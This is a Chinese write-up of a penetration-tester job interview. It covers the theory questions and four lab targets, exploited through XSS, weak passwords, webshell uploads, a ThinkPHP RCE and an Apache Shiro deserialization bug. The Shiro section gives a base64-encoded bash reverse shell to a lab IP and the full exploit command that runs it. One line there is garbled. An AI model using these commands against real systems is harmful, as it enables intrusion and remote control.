深圳市某安有限公司

面试公司：深圳市某安有限公司

薪资: 失败了，不太清楚
所在城市：深圳
面试岗位：渗透工程师
面试过程：因为太菜，所以找念旧内推了一下。
5月5号去的，因为是线下面试，主要是理论+实操。

面试问题：

请自我介绍一下
xxxxxxxxxxx

你挖过什么漏洞？
sql注入，文件上传，rce远程执行，弱口令，xss等

你怎么挖src的漏洞？
谷歌，fofa语法，或者挖通杀漏洞刷分。

会什么编程语言？
python，php基础

说一下你挖到过印象最深刻的漏洞？
我把风哥讲的远程代码执行怎么怎么操作的说了一遍，因为我没挖到过什么牛逼的洞。。

你了解tomcat漏洞吗，说一下？
Tomcat PUT方法任意写文件漏洞
tomcat 远程代码执行

你了解shiro漏洞吗，说一下？
不太了解

你了解反序列化吗？
序列化就是将对象的状态信息转为字符串，反序列化就是通过可控制unserialize将字符串转化信息拿出来用。（其实我也不太会）

你想往哪个方向发展？比如专注免杀，代码审计，app.....
web渗透

也没问太多，就到实操了

第一个靶场

题目：有5个flag，找出尽可能多的flag。
页面：一个登录页面，没有账号密码。
第一个在robots.txt里面

第二个在admin_area里面，抓包可以看见，以及登入密码

第三个在登入后，文件上传连接蚁剑里面找到

第四个也是在蚁剑里面翻到的

第五个我没找到，念旧说在linux里面，因为开放了22端口，但是我不晓得密码，连不上

第二个靶场

题目：挖掘尽可能多的漏洞
页面：新闻论坛之类的
挖掘思路：学过的漏洞，照着挖就可以了，没什么难度
一共6个：
1.搜索框，反射型XSS
2.发现是Apache，抓包 使用Burp的Spider模块，目录遍历漏洞
3.URL输入/admin，就可以到后台登录页面，弱口令
4.后台修改内容处，存储型XSS（可打到前台）
5.后台文章图片处，文件上传Getshell
6.xray扫到了一个Thinkphp框架的rce(CVE-2019-9082)

第三个靶场

题目：挖掘尽可能多的漏洞
页面：一个登录页面，有注册
挖掘思路：先注册一个账号，先登录
1.登录后可以修改个人信息，存储型XSS
2.Xray扫描，扫出一个代码执行，可以写shell，代码执行（双引号二次解析${}）
3.弱口令
4.任意注册

第四个靶场（这个漏洞我当时没做出来，但是后面复现了一下，就ok了）

题目：目标：Getshell
页面：一个登录页面
挖掘思路：指纹识别，我用vulmap扫出了Shiro框架（CVE-2016-4437）
漏洞版本
Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）
影响版本：Apache Shiro & /dev/tcp/192.168.43.171/1234 0>&1

这段是base64加密
```cpp
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE3MS8xMjM0IDA+JjE=

执行反弹shell

python3 shiro_exploit.py -t 3 -u http://192.168.43.78:8080/ -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE3MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

接收反弹shell

这里已经是root权限了，ok了

面试结果

失败